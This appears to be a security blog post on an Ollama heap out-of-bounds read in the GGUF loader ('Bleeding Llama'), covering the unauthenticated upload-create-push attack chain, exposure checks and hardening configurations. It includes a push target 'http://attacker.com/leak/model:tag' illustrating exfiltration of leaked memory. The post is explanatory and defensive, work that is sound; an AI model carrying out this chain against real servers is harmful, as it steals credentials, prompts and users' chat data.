CVE-2026-7482 Bleeding Llama: Ollama heap leak hits 300K servers

I run Ollama on my own box, and I noticed CVE-2026-7482 the way most self-hosters did: a Mastodon post from someone at Cyera Research linking to a write-up titled "Bleeding Llama." The name is doing a lot of work. The bug is a heap out-of-bounds read in the GGUF model loader, triggered by an unauthenticated POST to /api/create, and the data that leaks is whatever Ollama happens to have in adjacent heap pages: API keys, environment variables, system prompts, and chat data from concurrent sessions.

The CVSS score is 9.1. The patch is in Ollama 0.17.1. The 300,000-instance figure in the headline comes from Cyera's scan of the public IPv4 space on 10 May 2026. If you are running Ollama and you have not updated since 28 April, you are in that count.

This is a deep dive, not a brief, so the structure is: how the bug actually works, how you check whether you have been hit, how you harden an Ollama install against this class of bug rather than just this specific one, and what to take away about the wider self-hosted AI surface.

What GGUF is and why Ollama loads it without authentication

GGUF is the file format that llama.cpp and its downstream consumers, including Ollama, use to store quantised model weights. A GGUF file contains a header, a metadata block (model name, architecture, tokenizer config, quantisation parameters), and the tensor data itself. Tensors are described by a name, a shape (the multi-dimensional array of element counts), a quantisation type, and the offset into the file where the actual data starts.

Ollama exposes three endpoints relevant to this CVE:

POST /api/blobs/sha256:[digest], upload a binary blob, used by the CLI to push model files
POST /api/create, create a model entry from an uploaded blob, including converting it through quantisation
POST /api/push, push a model to a remote registry

By default, Ollama binds to 0.0.0.0:11434 with no authentication. That choice makes sense for a local-development tool. It makes very little sense once the port is open to the internet, which is the configuration 300,000 instances were running in when Cyera scanned.

The vulnerable path: POST /api/blobs/... accepts the malicious GGUF upload, POST /api/create triggers the conversion that triggers the OOB read, and POST /api/push ships the converted file (containing the leaked memory) to an attacker-controlled URL. All three endpoints are unauthenticated. The attacker does not need credentials, social engineering, or a foothold. They need a HTTP client and an IP address.

How the out-of-bounds read happens

The bug is in how Ollama trusts the tensor shape field when it computes how much data to read.

A GGUF tensor declares its shape as a list of dimensions. The element count is the product of the dimensions: a shape of [3, 3, 3] declares 27 elements. The actual tensor data in the file is a contiguous block of bytes whose size depends on the element count and the quantisation type.

Ollama's Elements() function multiplies the dimensions to get the count. The code that reads the tensor then iterates that many times, pulling element-sized chunks from the buffer. Nothing checks that the declared element count fits within the buffer the file actually contains. A GGUF file can declare a shape of [1, 1, 1000000] while providing only 100 bytes of tensor data. The reader will iterate one million times anyway, reading whatever happens to be in memory after the 100 bytes.

This is a classic length-confusion bug. The defence would be a single boundary check: verify that Elements() * element_size <= remaining_buffer_size. That check was not there. Adding it is what 0.17.1 does.

The attacker amplifies the leak by requesting F16-to-F32 quantisation conversion. F16 is 2 bytes per element, F32 is 4 bytes per element. The conversion is mathematically lossless (you can represent any F16 value exactly in F32), so the converted output preserves the raw bytes of the input region without numerical distortion. The result is a new model file on disk containing the leaked memory as an F32 tensor that, when read back, gives the attacker the raw heap bytes that were adjacent to the original tensor buffer.

Then they push the file. POST /api/push with a model name formatted as a URI (http://attacker.com/leak/model:tag) sends the file to the attacker's server. The Ollama push code does not validate that the target is a known registry; it treats the URI as the destination.

The leak is delivered. The Ollama process keeps running. The operator notices nothing.

What the leak contains

The heap region adjacent to a tensor buffer in Ollama is whatever Ollama happens to have allocated near that buffer. In practice, on a busy instance:

API keys. Ollama integrations frequently authenticate against external APIs (OpenAI fallback, Anthropic for hybrid pipelines, Hugging Face for model downloads). Those credentials live in environment variables that get copied onto the heap when the process reads them.
Environment variables. The entire environ block, including credentials for whatever else the host runs.
System prompts. The system prompt from any concurrent session leaks. For agent frameworks that embed business logic, customer instructions, or sensitive policy text into system prompts, those prompts are now exfiltrated.
User chat data. Prompts and responses from concurrent sessions, because Ollama keeps recent conversation context in memory for performance reasons.
Tool outputs. When Ollama is wired into an agent framework that runs tools, the outputs of those tools (including file contents, command outputs, and API responses) pass through the same process memory.

The Cyera write-up has examples. The pattern is depressingly recognisable: API keys with recognisable prefixes (sk-, hf_, AWS access key format), URLs containing internal hostnames, and snippets of conversation that read as obviously real because the language model output style is hard to forge in a memory dump.

How to check whether you are exposed

The straightforward check is the version:

ollama --version

Anything before 0.17.1 is vulnerable.

To check whether the daemon is reachable from outside the host:

# From a separate machine
curl http://<server-ip>:11434/api/tags

If you get a JSON response listing your models from anywhere other than localhost, the port is open. If your Ollama instance is on a server with a public IP and the port is exposed, you should assume the bug has been triggered against you at some point in the past 13 days. The exploit is trivial and there is no rate limit on the endpoint.

For evidence of exploitation, check Ollama logs for POST /api/create requests with unusual model names or oversized tensor shapes. The logs are at ~/.ollama/logs/server.log by default. Look for /api/push calls to destinations that are not your own registry. If the log retention is less than 13 days, you probably do not have the records to tell whether the bug was triggered, and the safe assumption is that it was.

If your Ollama process has access to credentials in the environment (which it does, because that is how Ollama loads its own configuration), assume those credentials are compromised. Rotate them.

Hardening an Ollama install

Updating to 0.17.1 closes this specific CVE. It does not close the wider problem, which is that Ollama is a developer-experience-first tool that binds to 0.0.0.0 with no authentication and exposes model-management endpoints that have not been hardened against adversarial inputs. The next bug in this class will land on the same architecture.

The architectural fixes, in order of priority:

1. Do not expose Ollama to the internet directly. Bind to localhost only:

export OLLAMA_HOST=127.0.0.1:11434

If you need network access, put Ollama behind a reverse proxy that enforces authentication. Caddy, Nginx, Traefik, or Cloudflare Access in front of 127.0.0.1:11434 is the deployment pattern that matches the threat model. The proxy handles authentication. Ollama handles inference. Nothing on the public internet talks directly to the Ollama API.

A minimal Caddy block:

ollama.example.com {
  basicauth {
    user $2a$14$<bcrypt-hash>
  }
  reverse_proxy 127.0.0.1:11434
}

2. Restrict the network namespace. On a Linux host running Ollama in a container, use a network mode that does not have host networking. The container should reach the GPU but should not reach the wider host network. Docker's --network=none plus a published port on the proxy is the configuration that works.

3. Isolate model management from inference. The /api/create and /api/push endpoints are administrative. They have a different security profile than /api/chat and /api/generate. If the reverse proxy can route the administrative paths to a separate authentication policy (TLS client cert, separate basic auth, IP allowlist) while leaving the inference paths under the inference user's credentials, the management surface stops being part of the inference attack surface.

In Caddy:

ollama.example.com {
  @admin path /api/create /api/push /api/pull /api/blobs/*
  handle @admin {
    basicauth {
      admin $2a$14$<admin-bcrypt-hash>
    }
    reverse_proxy 127.0.0.1:11434
  }
  handle {
    basicauth {
      user $2a$14$<user-bcrypt-hash>
    }
    reverse_proxy 127.0.0.1:11434
  }
}

4. Run Ollama as a low-privilege user. A dedicated ollama system account with no shell, no sudo, no access to anything outside its model directory. The heap leak still exposes whatever the process has access to, but the blast radius is bounded by the process's own permissions.

useradd -r -s /usr/sbin/nologin -d /var/lib/ollama ollama
chown -R ollama:ollama /var/lib/ollama

Run the systemd unit as that user, and remove credentials from the environment that the Ollama process does not strictly need.

5. Audit what is on the host. If your Ollama instance shares a host with a database, an application server, or a credential store, the heap leak is leaking those too. Whether Ollama itself uses those credentials is not the point; the point is that they share an environment. The deployment pattern that contains this risk is one host, one purpose. The deployment pattern that does not is "I had a GPU server, so I put everything on it."

What this says about the wider self-hosted AI surface

Ollama is the most popular self-hosted inference runtime. Its peers, LocalAI, vLLM, llama.cpp's server mode, text-generation-webui, have similar architectures: binds to a port, exposes APIs, defaults to no authentication, and parses adversary-controllable model file formats. The same class of bug exists in the parsers for SafeTensors, ONNX, and the various proprietary formats. Some of those parsers are more battle-tested than GGUF. Most are not.

The self-hosted AI movement, which I am part of, has prioritised developer experience over hardening. That trade-off was defensible when these tools ran on developer laptops behind home routers. It is less defensible now that people are running them on cloud VMs with public IPs because they need the GPU on a server that the team can reach.

The pattern that scales the trade-off into a security problem is the gap between "I am running this locally" (meaning: it is on my machine and the threat model is local processes) and "I am running this on my own server" (meaning: it is on a cloud VM with a public IP and the threat model is the internet). The defaults are identical in both cases. The exposure is not.

The fix is not to wait for Ollama to ship authentication by default, though that would help. The fix is to deploy Ollama the way you would deploy any other backend service: localhost binding, reverse proxy with auth, network isolation, least privilege. The tooling for this is mature and the configuration is short. The bit that is hard is acknowledging that "self-hosted" and "exposed to the internet without authentication" are different things, and that the developer-tooling defaults are not the deployment-time defaults.

For systems running Ollama on the public internet today, the immediate steps are: update to 0.17.1, rotate credentials, restrict the network exposure. The longer steps are: pick a reverse proxy, write the auth policy, separate the model-management surface from the inference surface, and treat the install like the production service it has become.

Read the full Cyera Research write-up for the bug-hunting timeline, the proof-of-concept code, and the responsible-disclosure exchange with the Ollama maintainers.

Daniel Gustafsson